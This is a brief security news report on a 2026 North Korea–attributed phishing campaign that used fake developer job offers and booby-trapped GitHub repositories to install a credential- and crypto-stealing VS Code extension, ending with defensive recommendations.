Security researchers have uncovered a new phishing campaign attributed to North Korean operators that sent more than 250 fraudulent job offer emails to developers over six weeks in April and May. The operation used fake recruitment pitches and code review requests to deploy malware across multiple operating systems and steal crypto assets alongside credentials.
- 250+ fake developer job offers sent over six weeks
- Attacks bypass platforms like LinkedIn, using email and GitHub
- Malware installs persistent VS Code extension to steal crypto and credentials
What happened
A previously unseen phishing campaign, believed to be backed by North Korean threat actors, sent over 250 fraudulent job offer emails to developers at nearly 100 organizations, mostly based in the United States, over April and May 2026. The emails were crafted to appear as legitimate job offers for developer roles and were used as a lure to distribute malicious software.
Targets were asked to clone GitHub repositories containing malicious code disguised as coding assignments or cryptocurrency-related projects. Once opened in code editors like Visual Studio Code or Cursor, pre-configured tasks silently executed malware loaders tailored for Linux, macOS, and Windows, though persistence mechanisms worked only on macOS and Linux.
Why it matters
This campaign highlights continued efforts by DPRK-linked threat groups to exploit professional networks in the technology and financial sectors by blending social engineering with developer workflows. Unlike earlier efforts relying on platforms such as LinkedIn, this campaign made extensive use of direct email and GitHub repositories, increasing attack scale and complexity.
The incorporation of a malicious VS Code extension that mimics Google services demonstrates an evolution in persistence techniques to maintain access across multiple operating systems, ultimately enabling theft of cryptocurrency wallets and developer credentials. The scale and industrialization suggest a significant resource investment and highlight risks to global tech ecosystems.
What to watch next
Organizations, especially those in technology and finance, should closely monitor for suspicious unsolicited job offers and requests to interact with unknown GitHub repositories. Security teams must strengthen email filtering, developer environment protections, and controls around code editor extensions to detect and block malicious payloads effectively.
Threat researchers will likely continue to observe this cluster’s evolution, including shifts in social engineering tactics and delivery infrastructure. Increased awareness and collaboration across the industry will be crucial to mitigating credential theft and cryptocurrency loss from these sophisticated threat operations.